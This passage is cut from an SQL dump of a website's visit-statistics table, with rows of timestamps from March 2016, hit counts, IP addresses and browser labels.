,'66.249.64.223',''),(29701,1459402773,8,0,8,0,'68.180.231.29',''),(29702,1459403009,1,1,0,0,'182.118.20.205','msie'),(29703,1459403040,1,0,1,0,'66.249.64.228',''),(29704,1459403152,1,1,0,0,'66.249.64.228','other'),(29705,1459403300,1,1,0,0,'217.69.133.228','other'),(29706,1459403301,2,2,0,0,'217.69.133.231','other'),(29707,1459403302,1,1,0,0,'217.69.133.233','other'),(29708,1459403355,1,1,0,0,'91.196.178.70','firefox'),(29709,1459403387,1,1,0,0,'62.210.215.100','chrome'),(29710,1459403487,1,1,0,0,'217.69.133.223','other'),(29712,1459403626,1,1,0,0,'5.255.253.113','other'),(29713,1459403630,1,1,0,0,'130.193.50.34','other'),(29714,1459404018,1,1,0,0,'46.211.2.8','chrome'),(29715,1459404326,1,1,0,0,'217.69.133.230','other'),(29716,1459404327,1,1,0,0,'217.69.133.229','other'),(29717,1459404469,1,1,0,0,'91.196.178.70','firefox'),(29718,1459404544,1,1,0,0,'217.69.133.68','other'),(29719,1459404794,1,1,0,0,'91.196.178.68','firefox'),(29720,1459404808,1,1,0,0,'217.69.133.67','other'),(29721,1459404809,1,1,0,0,'217.69.133.85','other'),(29723,1459404873,1,0,1,0,'66.249.64.228',''),(29724,1459404905,1,0,1,0,'66.249.64.223',''),(29725,1459404955,2,1,1,0,'66.249.64.223',''),(29726,1459405447,1,1,0,0,'66.249.93.67','chrome'),(29727,1459405593,1,0,1,0,'66.249.64.233',''),(29728,1459405602,1,1,0,0,'66.249.64.228','other'),(29729,1459405681,1,0,1,0,'66.249.64.156',''),(29730,1459405923,1,1,0,0,'217.69.133.85','other'),(29731,1459405948,6,5,1,0,'66.249.64.223',''),(29732,1459406486,1,0,1,0,'68.180.231.29',''),(29733,1459406966,1,1,0,0,'217.69.133.239','other'),(29734,1459406967,2,2,0,0,'217.69.133.235','other'),(29735,1459407129,1,0,1,0,'66.249.64.223',''),(29736,1459407153,1,1,0,0,'66.249.89.114','other'),(29737,1459407173,13,13,0,0,'66.249.64.223','other'),(29738,1459407217,31,31,0,0,'51.254.32.67','other'),(29739,1459407223,1,1,0,0,'217.69.133.236','other'),(29740,1459407224,1,1,0,0,'217.69.133.237','other'),(29741,1459407536,1,1,0,0,'130.193.50.34','other'),(29742,1459407740,1,1,0,0,'217.69.133.224','other'),(29743,1459407741,1,1,0,0,'217.69.133.69','other'),(29744,1459407754,2,2,0,0,'217.69.133.231','other'),(29745,1459407831,1,1,0,0,'217.69.133.216','other'),(29746,1459407832,1,1,0,0,'217.69.133.218','other'),(29747,1459408103,1,1,0,0,'217.69.133.193','other'),(29748,1459408104,1,1,0,0,'217.69.133.12','other'),(29749,1459408216,1,1,0,0,'217.69.133.227','other'),(29750,1459408243,1,1,0,0,'217.69.133.84','other'),(29751,1459408244,1,1,0,0,'217.69.133.239','other'),(29752,1459408300,2,2,0,0,'91.196.178.70','chrome'),(29753,1459408404,1,1,0,0,'217.69.133.68','other'),(29754,1459408405,1,1,0,0,'217.69.133.221','other'),(29755,1459408406,1,1,0,0,'217.69.133.220','other'),(29756,1459408407,1,1,0,0,'217.69.133.225','other'),(29757,1459408603,1,1,0,0,'130.193.50.34','other'),(29758,1459409147,1,1,0,0,'217.69.133.233','other'),(29759,1459409148,1,1,0,0,'217.69.133.227','other'),(29760,1459409369,1,1,0,0,'91.196.178.161','chrome'),(29761,1459409502,1,1,0,0,'92.112.200.147','firefox'),(29762,1459409695,1,1,0,0,'94.178.249.112','chrome'),(29763,1459409876,1,1,0,0,'217.69.133.232','other'),(29764,1459409877,1,1,0,0,'217.69.133.228','other'),(29765,1459410026,1,1,0,0,'217.69.133.223','other'),(29766,1459410217,1,1,0,0,'164.132.161.81','other'),(29767,1459410417,1,1,0,0,'46.149.94.131','chrome'),(29768,1459410435,1,1,0,0,'192.166.219.136','other'),(29769,1459410720,1,1,0,0,'217.69.133.222','other'),(29771,1459410721,1,1,0,0,'217.69.133.221','other'),(29772,1459410722,1,1,0,0,'217.69.133.224','other'),(29773,1459411003,1,1,0,0,'164.132.161.53','other'),(29774,1459411052,1,1,0,0,'8.29.198.26','other'),(29775,1459411439,1,1,0,0,'217.69.133.216','other'),(29777,1459411913,1,1,0,0,'91.206.4.59','chrome'),(29778,1459412193,1,1,0,0,'94.179.115.137','firefox'),(29779,1459412272,3,0,3,0,'66.249.64.233',''),(29780,1459412641,1,1,0,0,'51.255.65.77','other'),(29781,1459412710,1,0,1,0,'68.180.229.103',''),(29782,1459412812,1,0,1,0,'68.180.231.29',''),(29783,1459412823,2,0,2,0,'66.249.64.228',''),(29784,1459412868,1,1,0,0,'217.69.133.225','other'),(29785,1459412869,1,1,0,0,'217.69.133.222','other'),(29786,1459412871,1,1,0,0,'217.69.133.221','other'),(29787,1459412872,1,1,0,0,'217.69.133.226','other'),(29788,1459412891,2,2,0,0,'217.69.133.70','other'),(29789,1459412894,1,1,0,0,'217.69.133.235','other'),(29791,1459413198,2,2,0,0,'217.69.133.232','other'),(29792,1459413275,2,2,0,0,'217.69.133.85','other'),(29793,1459413280,2,2,0,0,'217.69.133.69','other'),(29794,1459413281,1,1,0,0,'217.69.133.227','other'),(29795,1459413282,1,1,0,0,'217.69.133.229','other'),(29796,1459413632,1,0,1,0,'66.249.64.156',''),(29797,1459413839,1,1,0,0,'94.125.126.133','firefox'),(29798,1459413898,1,1,0,0,'217.69.133.84','other'),(29799,1459413937,1,0,1,0,'66.249.64.233',''),(29800,1459414833,1,1,0,0,'95.158.62.12','chrome'),(29801,1459414863,1,1,0,0,'217.69.136.207','other'),(29802,1459414865,2,2,0,0,'217.69.136.205','other'),(29803,1459414866,1,1,0,0,'217.69.136.204','other'),(29804,1459414935,1,1,0,0,'91.196.178.72','chrome'),(29805,1459414956,2,2,0,0,'217.69.133.226','other'),(29806,1459414957,2,2,0,0,'217.69.133.225','other'),(29807,1459414959,1,1,0,0,'217.69.133.223','other'),(29808,1459415132,1,1,0,0,'31.43.250.131','chrome'),(29809,1459415438,3,3,0,0,'46.4.87.105','other'),(29810,1459415708,1,1,0,0,'157.55.39.165','other'),(29811,1459415867,1,1,0,0,'91.196.178.68','chrome'),(29812,1459416254,1,1,0,0,'217.69.133.84','other'),(29813,1459416549,1,1,0,0,'95.133.31.189','chrome'),(29814,1459416655,1,1,0,0,'91.196.178.72','chrome'),(29815,1459416739,1,1,0,0,'141.8.132.105','other'),(29816,1459416760,2,2,0,0,'217.69.133.216','other'),(29817,1459416762,1,1,0,0,'217.69.133.219','other'),(29818,1459416836,1,0,1,0,'66.249.64.223',''),(29819,1459416885,1,0,1,0,'66.249.64.162',''),(29820,1459416972,1,0,1,0,'66.249.64.233',''),(29821,1459417028,1,1,0,0,'188.231.221.9','chrome'),(29822,1459417115,1,1,0,0,'91.196.178.66','firefox'),(29823,1459417544,1,1,0,0,'66.249.89.114','other'),(29824,1459417591,1,1,0,0,'141.8.142.58','other'),(29825,1459417821,19,19,0,0,'130.193.50.34','other'),(29826,1459417830,9,9,0,0,'141.8.132.105','other'),(29827,1459417856,1,1,0,0,'141.8.183.25','other'),(29828,1459418025,2,2,0,0,'207.46.13.94','other'),(29829,1459418383,1,1,0,0,'217.69.133.84','other'),(29830,1459418384,1,1,0,0,'217.69.133.219','other'),(29832,1459418505,1,1,0,0,'5.255.253.113','other'),(29833,1459418509,1,1,0,0,'130.193.51.83','other'),(29834,1459418601,1,0,1,0,'66.249.64.223',''),(29835,1459418606,1,0,1,0,'66.249.64.156',''),(29836,1459418652,1,1,0,0,'217.69.133.234','other'),(29837,1459418653,1,1,0,0,'217.69.133.239','other'),(29838,1459418817,1,1,0,0,'188.231.221.9','chrome'),(29839,1459418978,1,1,0,0,'217.69.133.69','other'),(29840,1459418979,1,1,0,0,'217.69.133.227','other'),(29841,1459419211,2,2,0,0,'94.23.19.178','other'),(29842,1459419786,1,1,0,0,'217.69.133.85','other'),(29843,1459419787,1,1,0,0,'217.69.133.218','other'),(29844,1459419788,1,1,0,0,'217.69.133.67','other'),(29845,1459419796,1,1,0,0,'164.132.161.16','other'),(29846,1459419879,1,1,0,0,'168.235.207.150','other'),(29847,1459419950,2,2,0,0,'217.69.133.203','other'),(29848,1459419951,1,1,0,0,'217.69.133.5','other'),(29849,1459419954,1,1,0,0,'217.69.133.2','other'),(29850,1459419961,2,0,2,0,'66.249.64.223',''),(29851,1459420151,1,1,0,0,'217.69.133.233','other'),(29852,1459420264,1,0,1,0,'66.249.64.228',''),(29853,1459420275,3,3,0,0,'217.69.133.222','other'),(29854,1459420327,1,1,0,0,'164.132.161.57','other'),(29855,1459420518,1,1,0,0,'91.196.178.66','firefox'),(29856,1459420638,1,1,0,0,'77.248.252.113','other'),(29857,1459420787,2,2,0,0,'217.69.133.226','other'),(29858,1459421125,1,1,0,0,'217.69.133.9','other'),(29859,1459421126,1,1,0,0,'217.69.133.203','other'),(29860,1459421129,1,1,0,0,'217.69.133.228','other'),(29861,1459421130,1,1,0,0,'217.69.133.227','other'),(29862,1459421190,1,0,1,0,'66.249.64.162',''),(29863,1459421266,2,0,2,0,'68.180.231.29',''),(29864,1459421434,1,1,0,0,'217.69.133.85','other'),(29865,1459421435,1,1,0,0,'217.69.133.84','other'),(29867,1459421799,2,2,0,0,'217.69.133.225','other'),(29868,1459421825,1,1,0,0,'217.69.133.217','other'),(29869,1459421881,1,1,0,0,'91.196.178.168','firefox'),(29870,1459421902,1,1,0,0,'8.29.198.25','other'),(29871,1459422053,1,1,0,0,'51.255.65.55','other'),(29872,1459422496,1,0,1,0,'66.249.64.228',''),(29873,1459422864,1,1,0,0,'91.196.178.161','chrome'),(29874,1459422966,1,0,1,0,'66.249.64.150',''),(29875,1459423168,2,2,0,0,'95.132.47.104','firefox'),(29876,1459423456,1,0,1,0,'66.249.64.223',''),(29877,1459423863,1,1,0,0,'178.95.246.242','chrome'),(29878,1459424078,1,1,0,0,'217.69.133.6','other'),(29879,1459424165,1,1,0,0,'217.69.133.11','other'),(29880,1459424167,1,1,0,0,'217.69.133.10','other'),(29881,1459424168,1,1,0,0,'217.69.133.234','other'),(29882,1459424169,1,1,0,0,'217.69.133.14','other'),(29884,1459424357,1,1,0,0,'130.193.51.83','other'),(29885,1459424358,2,2,0,0,'217.69.133.215','other'),(29887,1459424456,7,7,0,0,'130.193.50.34','other'),(29888,1459424827,2,2,0,0,'217.69.133.239','other'),(29889,1459424922,1,1,0,0,'217.69.133.217','other'),(29890,1459424928,1,1,0,0,'217.69.133.231','other'),(29891,1459424929,1,1,0,0,'217.69.133.233','other'),(29892,1459424943,2,0,2,0,'66.249.64.223',''),(29893,1459424966,1,1,0,0,'217.69.133.238','other'),(29894,1459424967,1,1,0,0,'51.255.65.17','other'),(29895,1459425245,1,0,1,0,'66.249.64.228',''),(29896,1459425313,1,1,0,0,'62.210.215.100','chrome'),(29897,1459425543,1,0,1,0,'68.180.229.103',''),(29898,1459425586,2,0,2,0,'68.180.231.29',''),(29899,1459425620,1,1,0,0,'217.69.133.225','other'),(29900,1459425621,1,1,0,0,'217.69.133.220','other'),(29902,1459425830,1,1,0,0,'91.196.178.66','chrome'),(29903,1459425924,2,2,0,0,'217.69.133.232','other'),(29905,1459425962,1,1,0,0,'217.69.133.240','other'),(29906,1459426384,1,1,0,0,'66.249.64.228','other'),(29907,1459426432,1,1,0,0,'217.69.133.219','other'),(29908,1459426521,1,1,0,0,'217.69.133.230','other'),(29909,1459426669,1,1,0,0,'91.196.178.66','firefox'),(29910,1459426840,2,2,0,0,'40.77.167.35','other'),(29911,1459427462,1,1,0,0,'178.95.246.242','chrome'),(29912,1459427724,1,1,0,0,'217.69.136.208','other'),(29913,1459427725,1,1,0,0,'217.69.136.203','other'),(29914,1459427726,1,1,0,0,'217.69.136.209','other'),(29915,1459427727,1,1,0,0,'217.69.136.204','other'),(29916,1459427815,1,1,0,0,'91.196.178.66','firefox'),(29917,1459428128,1,0,1,0,'68.180.231.29',''),(29918,1459428343,2,2,0,0,'141.8.183.25','other'),(29919,1459428348,2,2,0,0,'5.255.253.113','other'),(29920,1459428352,1,1,0,0,'141.8.132.105','other'),(29921,1459428427,1,1,0,0,'180.76.15.150','other'),(29922,1459428469,1,1,0,0,'91.196.178.135','firefox'),(29923,1459428487,1,1,0,0,'5.255.253.47','other'),(29924,1459428495,1,1,0,0,'217.69.133.226','other'),(29926,1459428519,5,5,0,0,'130.193.50.34','other'),(29927,1459428575,1,0,1,0,'66.249.64.223',''),(29928,1459428612,1,1,0,0,'178.92.248.100','chrome'),(29929,1459428649,1,0,1,0,'66.249.64.228',''),(29930,1459428673,1,1,0,0,'66.249.89.118','other'),(29931,1459428908,2,1,1,0,'66.249.64.228',''),(29932,1459429421,2,0,2,0,'68.180.231.29',''),(29933,1459429494,1,0,1,0,'66.249.64.223',''),(29934,1459429533,1,1,0,0,'178.92.190.183','chrome'),(29935,1459430236,1,1,0,0,'91.196.178.65','chrome'),(29936,1459430260,1,1,0,0,'66.249.89.114','other'),(29937,1459430296,1,1,0,0,'217.69.133.220','other'),(29938,1459430297,1,1,0,0,'217.69.133.226','other'),(29939,1459430298,1,1,0,0,'217.69.133.223','other'),(29940,1459430392,2,2,0,0,'217.69.133.233','other'),(29941,1459430666,1,1,0,0,'217.69.133.225','other'),(29942,1459430680,1,1,0,0,'217.69.133.236','other'),(29944,1459430681,1,1,0,0,'217.69.133.70','other'),(29945,1459430704,1,1,0,0,'217.69.133.84','other'),(29946,1459430705,1,1,0,0,'217.69.133.67','other'),(29947,1459430781,1,1,0,0,'178.95.246.242','chrome'),(29948,1459430841,1,1,0,0,'66.249.64.150','other'),(29949,1459430884,1,1,0,0,'171.25.193.78','chrome'),(29950,1459430974,1,1,0,0,'95.135.55.222','opera'),(29951,1459430985,1,1,0,0,'217.69.133.230','other'),(29952,1459430996,1,1,0,0,'176.126.252.12','chrome'),(29953,1459431222,1,1,0,0,'151.80.31.169','other'),(29954,1459431223,1,1,0,0,'151.80.31.109','other'),(29955,1459431337,1,1,0,0,'217.69.133.231','other'),(29956,1459431339,1,1,0,0,'217.69.133.233','other'),(29957,1459431406,1,0,1,0,'66.249.64.223',''),(29958,1459431422,1,1,0,0,'217.69.133.240','other'),(29959,1459432187,1,1,0,0,'217.69.133.68','other'),(29960,1459432188,1,1,0,0,'217.69.133.225','other'),(29961,1459432308,1,1,0,0,'66.249.64.156','other'),(29962,1459432336,1,1,0,0,'217.69.133.232','other'),(29964,1459432413,5,5,0,0,'46.165.197.142','other'),(29965,1459432426,2,0,2,0,'66.249.64.150',''),(29966,1459432446,1,1,0,0,'180.76.15.34','other'),(29967,1459432650,2,0,2,0,'66.249.64.223',''),(29968,1459432654,1,1,0,0,'178.94.172.57','chrome'),(29969,1459432745,1,1,0,0,'8.29.198.25','other'),(29970,1459433209,1,1,0,0,'66.249.64.156','other'),(29971,1459433242,1,1,0,0,'217.69.133.5','other'),(29972,1459433244,1,1,0,0,'217.69.133.203','other'),(29973,1459433245,2,2,0,0,'217.69.133.6','other'),(29974,1459433247,1,1,0,0,'217.69.133.4','other'),(29975,1459433289,1,1,0,0,'37.52.103.151','opera'),(29976,1459433488,1,1,0,0,'66.249.64.150','other'),(29977,1459433606,2,0,2,0,'66.249.64.223',''),(29978,1459433611,1,1,0,0,'207.46.13.94','other'),(29979,1459433796,1,1,0,0,'217.69.133.67','other'),(29980,1459434354,2,2,0,0,'95.213.141.126','opera'),(29981,1459434414,1,1,0,0,'66.249.64.156','other'),(29982,1459434468,2,2,0,0,'178.154.189.202','other'),(29983,1459434596,1,1,0,0,'178.95.186.74','firefox'),(29984,1459434797,1,1,0,0,'164.132.161.2','other'),(29985,1459434878,1,1,0,0,'51.255.65.61','other'),(29986,1459434982,1,1,0,0,'95.132.1.60','opera'),(29987,1459435092,2,2,0,0,'66.249.64.233','other'),(29988,1459435121,1,0,1,0,'66.249.64.150',''),(29989,1459435219,1,1,0,0,'217.69.143.61','other'),(29990,1459435300,1,1,0,0,'217.69.133.238','other'),(29991,1459435301,1,1,0,0,'217.69.133.234','other'),(29992,1459435387,1,1,0,0,'91.214.19.27','chrome'),(29993,1459435864,1,1,0,0,'217.69.133.228','other'),(29994,1459436038,1,1,0,0,'217.69.133.84','other'),(29995,1459436039,1,1,0,0,'217.69.133.219','other'),(29996,1459436040,1,1,0,0,'217.69.133.216','other'),(29997,1459436058,2,2,0,0,'217.69.133.224','other'),(29998,1459436059,1,1,0,0,'217.69.133.222','other'),(30000,1459436060,1,1,0,0,'217.69.133.68','other'),(30002,1459436301,2,2,0,0,'217.69.133.4','other'),(30003,1459436304,1,1,0,0,'217.69.133.3','other'),(30004,1459436359,1,1,0,0,'217.69.133.239','other'),(30005,1459436373,1,1,0,0,'217.69.133.230','other'),(30006,1459436374,1,1,0,0,'217.69.133.227','other'),(30007,1459436432,1,1,0,0,'217.69.133.69','other'),(30008,1459436438,1,1,0,0,'217.69.133.226','other'),(30009,1459436549,1,1,0,0,'77.239.167.30','firefox'),(30010,1459436569,1,1,0,0,'66.249.64.228','other'),(30011,1459436633,2,2,0,0,'130.193.50.34','other'),(30012,1459437360,1,1,0,0,'217.69.133.236','other'),(30013,1459437404,1,1,0,0,'51.255.65.35','other'),(30014,1459437592,6,6,0,0,'63.141.226.178','other'),(30015,1459437618,1,0,1,0,'66.249.64.233',''),(30016,1459437802,1,1,0,0,'91.196.178.129','chrome'),(30017,1459437807,1,1,0,0,'168.235.207.150','other'),(30018,1459437839,2,2,0,0,'66.249.64.223','other'),(30019,1459438005,1,1,0,0,'130.180.212.130','chrome'),(30020,1459438408,2,0,2,0,'68.180.231.29',''),(30021,1459438519,1,1,0,0,'217.69.133.218','other'),(30022,1459438579,1,1,0,0,'151.80.31.105','other'),(30023,1459438700,1,1,0,0,'91.196.178.34','chrome'),(30024,1459438770,1,1,0,0,'66.249.93.120','chrome'),(30025,1459439138,1,0,1,0,'66.249.64.233',''),(30026,1459439185,1,1,0,0,'217.69.133.223','other'),(30027,1459439186,1,1,0,0,'217.69.133.222','other'),(30028,1459439464,1,1,0,0,'217.69.133.218','other'),(30029,1459439912,1,1,0,0,'40.77.167.26','other'),(30030,1459439938,1,1,0,0,'62.210.215.100','chrome'),(30031,1459440071,1,1,0,0,'93.158.152.9','other'),(30032,1459440076,1,1,0,0,'93.158.152.84','other'),(30033,1459440331,1,1,0,0,'217.69.133.18','other'),(30034,1459440822,1,1,0,0,'51.255.65.27','other'),(30035,1459441117,2,0,2,0,'66.249.64.228',''),(30036,1459441157,1,1,0,0,'217.69.133.217','other'),(30037,1459441158,4,4,0,0,'217.69.133.84','other'),(30039,1459441159,1,1,0,0,'217.69.133.67','other'),(30040,1459441265,2,2,0,0,'217.69.133.215','other'),(30041,1459441460,1,1,0,0,'217.69.133.70','other'),(30042,1459441461,1,1,0,0,'217.69.133.234','other'),(30044,1459441516,1,1,0,0,'217.69.133.194','other'),(30045,1459441518,1,1,0,0,'217.69.133.3','other'),(30046,1459441519,1,1,0,0,'217.69.133.9','other'),(30047,1459441548,1,1,0,0,'217.69.133.222','other'),(30048,1459441595,1,1,0,0,'217.69.133.228','other'),(30049,1459441596,1,1,0,0,'217.69.133.230','other'),(30050,1459441641,1,1,0,0,'66.249.89.118','other'),(30051,1459441724,1,1,0,0,'94.179.72.206','firefox'),(30052,1459441950,1,1,0,0,'217.69.133.231','other'),(30053,1459441953,1,1,0,0,'217.69.133.233','other'),(30054,1459441954,2,2,0,0,'217.69.133.232','other'),(30055,1459442165,1,1,0,0,'95.135.91.48','firefox'),(30056,1459442273,1,1,0,0,'178.94.172.57','chrome'),(30057,1459442515,1,1,0,0,'217.69.133.6','other'),(30058,1459442516,1,1,0,0,'217.69.133.203','other'),(30059,1459442712,1,1,0,0,'217.69.133.238','other'),(30060,1459442713,1,1,0,0,'217.69.133.70','other'),(30061,1459442727,1,1,0,0,'95.134.123.63','opera'),(30062,1459442909,1,1,0,0,'217.69.133.224','other'),(30063,1459443052,1,1,0,0,'217.69.133.227','other'),(30064,1459443053,1,1,0,0,'217.69.133.229','other'),(30065,1459443460,1,0,1,0,'66.249.64.223',''),(30066,1459443578,1,1,0,0,'8.29.198.25','other'),(30067,1459443672,1,1,0,0,'217.69.133.225','other'),(30068,1459443673,1,1,0,0,'217.69.133.68','other'),(30069,1459443746,1,1,0,0,'217.69.133.230','other'),(30070,1459443747,1,1,0,0,'217.69.133.228','other'),(30072,1459444122,1,1,0,0,'164.132.161.32','other'),(30073,1459444558,1,1,0,0,'141.8.142.55','other'),(30074,1459444942,1,1,0,0,'217.69.133.224','other'),(30075,1459444944,1,1,0,0,'217.69.133.223','other'),(30076,1459445083,1,1,0,0,'217.69.133.215','other'),(30078,1459445084,2,2,0,0,'217.69.133.219','other'),(30079,1459445262,1,0,1,0,'68.180.229.103',''),(30080,1459445316,2,0,2,0,'68.180.231.29',''),(30081,1459445472,2,2,0,0,'217.69.133.229','other'),(30082,1459445474,1,1,0,0,'217.69.133.69','other'),(30083,1459445502,1,1,0,0,'62.210.215.100','chrome'),(30084,1459445676,1,1,0,0,'180.76.15.22','other'),(30085,1459445891,2,0,2,0,'66.249.64.233',''),(30086,1459445897,2,2,0,0,'217.69.133.18','other'),(30087,1459445972,1,0,1,0,'66.249.64.228',''),(30088,1459446056,1,1,0,0,'37.53.225.220','chrome'),(30089,1459446086,1,1,0,0,'93.73.236.7','chrome'),(30090,1459446290,1,0,1,0,'68.180.231.29',''),(30091,1459446511,1,0,1,0,'66.249.64.223',''),(30092,1459446526,1,1,0,0,'217.69.133.9','other'),(30093,1459446527,1,1,0,0,'217.69.133.2','other'),(30094,1459446573,1,1,0,0,'51.255.65.14','other'),(30095,1459446642,1,1,0,0,'51.255.65.31','other'),(30096,1459446736,1,1,0,0,'217.69.133.84','other'),(30097,1459446985,1,1,0,0,'217.69.133.216','other'),(30099,1459447227,1,0,1,0,'68.180.231.29',''),(30100,1459447320,2,2,0,0,'217.69.133.237','other'),(30101,1459447448,1,1,0,0,'66.249.64.223','other'),(30102,1459447479,1,1,0,0,'217.69.133.236','other'),(30103,1459447513,1,1,0,0,'217.69.133.12','other'),(30104,1459447515,2,2,0,0,'217.69.133.18','other'),(30105,1459447572,1,1,0,0,'217.69.133.231','other'),(30107,1459447573,3,3,0,0,'217.69.133.230','other'),(30108,1459447641,1,1,0,0,'217.69.133.69','other'),(30109,1459448149,1,1,0,0,'207.46.13.94','other'),(30110,1459448216,1,1,0,0,'217.69.133.226','other'),(30111,1459448217,1,1,0,0,'217.69.133.223','other'),(30112,1459448255,1,0,1,0,'66.249.64.228',''),(30113,1459448290,1,0,1,0,'66.249.64.150',''),(30114,1459448355,1,1,0,0,'91.196.178.37','chrome'),(30115,1459448438,2,0,2,0,'66.249.64.233',''),(30116,1459448528,1,0,1,0,'66.249.64.156',''),(30117,1459449383,1,0,1,0,'68.180.231.29',''),(30118,1459449471,1,1,0,0,'178.154.189.202','other'),(30119,1459449853,3,3,0,0,'217.69.133.218','other'),(30120,1459449855,2,2,0,0,'217.69.133.219','other'),(30121,1459449856,1,1,0,0,'217.69.133.84','other'),(30122,1459450434,1,1,0,0,'217.69.133.67','other'),(30124,1459450584,2,0,2,0,'66.249.64.228',''),(30125,1459450658,2,0,2,0,'66.249.64.223',''),(30126,1459450775,1,1,0,0,'178.210.137.29','chrome'),(30127,1459450826,1,1,0,0,'91.196.177.69','chrome'),(30128,1459450969,2,2,0,0,'217.69.133.221','other'),(30129,1459451299,1,1,0,0,'51.255.65.17','other'),(30130,1459451766,228,228,0,0,'5.9.85.4','other'),(30131,1459452365,1,1,0,0,'40.77.167.35','other'),(30132,1459452408,1,1,0,0,'217.69.133.228','other'),(30133,1459452491,1,1,0,0,'217.69.133.84','other'),(30134,1459452493,1,1,0,0,'217.69.133.85','other'),(30135,1459452494,1,1,0,0,'217.69.133.217','other'),(30136,1459452745,1,1,0,0,'207.46.13.94','other'),(30137,1459452811,1,1,0,0,'66.249.89.114','other'),(30138,1459452881,1,1,0,0,'66.249.64.223','other'),(30139,1459452934,1,1,0,0,'217.69.133.225','other'),(30140,1459452935,1,1,0,0,'217.69.133.220','other'),(30141,1459452936,2,2,0,0,'217.69.133.68','other'),(30142,1459453005,2,0,2,0,'68.180.231.29',''),(30143,1459453283,1,1,0,0,'217.69.136.203','other'),(30144,1459453284,1,1,0,0,'217.69.136.206','other'),(30145,1459453298,1,1,0,0,'217.69.133.239','other'),(30146,1459453618,1,0,1,0,'66.249.64.233',''),(30147,1459453752,1,1,0,0,'151.80.31.176','other'),(30148,1459453875,1,1,0,0,'217.69.133.238','other'),(30150,1459453876,1,1,0,0,'217.69.133.236','other'),(30151,1459453967,1,1,0,0,'217.69.133.233','other'),(30152,1459453968,1,1,0,0,'217.69.133.231','other'),(30153,1459454391,1,1,0,0,'8.29.198.25','other'),(30154,1459454487,1,1,0,0,'217.69.133.224','other'),(30155,1459454488,1,1,0,0,'217.69.133.226','other'),(30156,1459454489,1,1,0,0,'217.69.133.225','other'),(30157,1459454714,1,0,1,0,'66.249.64.233',''),(30158,1459454746,1,1,0,0,'217.69.133.229','other'),(30159,1459454886,4,4,0,0,'37.187.137.225','other'),(30160,1459454971,1,1,0,0,'66.249.64.150','other'),(30161,1459455030,1,1,0,0,'66.249.64.162','other'),(30162,1459455090,1,0,1,0,'66.249.64.223',''),(30163,1459455393,1,1,0,0,'217.69.133.67','other'),(30164,1459455394,1,1,0,0,'217.69.133.217','other'),(30166,1459455653,1,1,0,0,'82.145.209.202','other'),(30167,1459455876,1,1,0,0,'217.69.133.215','other'),(30168,1459455877,1,1,0,0,'217.69.133.218','other'),(30169,1459456263,1,1,0,0,'164.132.161.21','other'),(30170,1459456492,1,1,0,0,'217.69.133.68','other'),(30171,1459456493,1,1,0,0,'217.69.133.221','other'),(30172,1459456574,1,1,0,0,'130.193.50.4','other'),(30173,1459456688,1,1,0,0,'157.55.39.82','other'),(30174,1459456738,1,1,0,0,'164.132.161.81','other'),(30175,1459456742,1,1,0,0,'217.69.133.226','other'),(30176,1459456906,1,1,0,0,'217.69.133.4','other'),(30177,1459456907,3,3,0,0,'217.69.133.194','other'),(30178,1459456909,2,2,0,0,'217.69.133.3','other'),(30179,1459457100,1,0,1,0,'68.180.231.29',''),(30180,1459457418,1,1,0,0,'82.145.209.202','opera'),(30181,1459457471,1,1,0,0,'217.69.133.203','other'),(30182,1459457473,1,1,0,0,'217.69.133.5','other'),(30183,1459457669,1,1,0,0,'217.69.133.216','other'),(30184,1459457682,1,1,0,0,'40.77.167.26','other'),(30185,1459457773,1,1,0,0,'164.132.161.72','other'),(30186,1459457939,1,1,0,0,'180.76.15.141','other'),(30187,1459458328,1,0,1,0,'68.180.231.29',''),(30188,1459458391,1,1,0,0,'178.92.158.253','chrome'),(30189,1459458619,2,2,0,0,'217.69.133.232','other'),(30190,1459458696,1,1,0,0,'217.69.133.226','other'),(30191,1459458698,2,2,0,0,'217.69.133.221','other'),(30192,1459458863,1,1,0,0,'217.69.133.229','other'),(30193,1459458864,1,1,0,0,'217.69.133.230','other'),(30194,1459458918,1,1,0,0,'195.245.118.14','chrome'),(30195,1459458932,1,1,0,0,'217.69.143.46','other'),(30196,1459459031,1,1,0,0,'95.213.6.4','other'),(30198,1459459377,1,0,1,0,'68.180.231.29',''),(30199,1459459456,1,0,1,0,'66.249.64.156',''),(30200,1459459514,1,1,0,0,'217.69.133.228','other'),(30201,1459459515,2,2,0,0,'217.69.133.233','other'),(30202,1459459801,1,1,0,0,'217.69.133.232','other'),(30203,1459459972,1,0,1,0,'66.249.64.228',''),(30204,1459459989,20,20,0,0,'178.63.1.153','other'),(30205,1459460219,1,1,0,0,'217.69.133.225','other'),(30206,1459460424,2,2,0,0,'217.69.133.85','other'),(30207,1459460490,1,0,1,0,'68.180.231.29',''),(30208,1459460528,1,1,0,0,'217.69.133.221','other'),(30209,1459460610,1,1,0,0,'130.193.50.34','other'),(30210,1459460726,1,1,0,0,'217.69.133.217','other'),(30211,1459460727,1,1,0,0,'217.69.133.67','other'),(30212,1459460804,1,1,0,0,'168.235.205.110','other'),(30213,1459460890,42,42,0,0,'178.63.1.153','other'),(30214,1459461586,1,1,0,0,'62.210.215.100','chrome'),(30215,1459461811,46,46,0,0,'178.63.1.153','other'),(30216,1459462420,5,0,5,0,'66.249.64.228',''),(30217,1459462585,1,1,0,0,'40.77.167.35','other'),(30218,1459462650,1,1,0,0,'217.69.133.11','other'),(30219,1459462651,2,2,0,0,'217.69.133.10','other'),(30220,1459462655,1,1,0,0,'217.69.133.18','other'),(30221,1459462730,43,43,0,0,'178.63.1.153','other'),(30222,1459463441,1,1,0,0,'66.249.89.118','other'),(30223,1459463642,22,22,0,0,'178.63.1.153','other'),(30224,1459463643,2,2,0,0,'217.69.133.225','other'),(30225,1459463821,1,0,1,0,'66.249.64.233',''),(30226,1459463857,1,0,1,0,'66.249.64.228',''),(30227,1459463911,2,2,0,0,'217.69.133.13','other'),(30228,1459463913,1,1,0,0,'217.69.133.193','other'),(30229,1459463914,1,1,0,0,'217.69.133.12','other'),(30230,1459463944,1,0,1,0,'68.180.231.29',''),(30231,1459464410,1,1,0,0,'217.69.133.215','other'),(30232,1459464423,1,1,0,0,'217.69.133.220','other'),(30233,1459464442,2,0,2,0,'66.249.64.223',''),(30234,1459464462,1,1,0,0,'130.193.50.34','other'),(30235,1459464633,1,1,0,0,'37.204.154.137','msie'),(30237,1459464634,1,1,0,0,'46.188.72.113','opera'),(30238,1459464635,1,1,0,0,'5.165.244.159','msie'),(30240,1459464694,1,1,0,0,'51.255.65.77','other'),(30241,1459464930,1,1,0,0,'217.69.133.232','other'),(30242,1459465223,1,1,0,0,'8.29.198.26','other'),(30243,1459465315,1,1,0,0,'217.69.133.235','o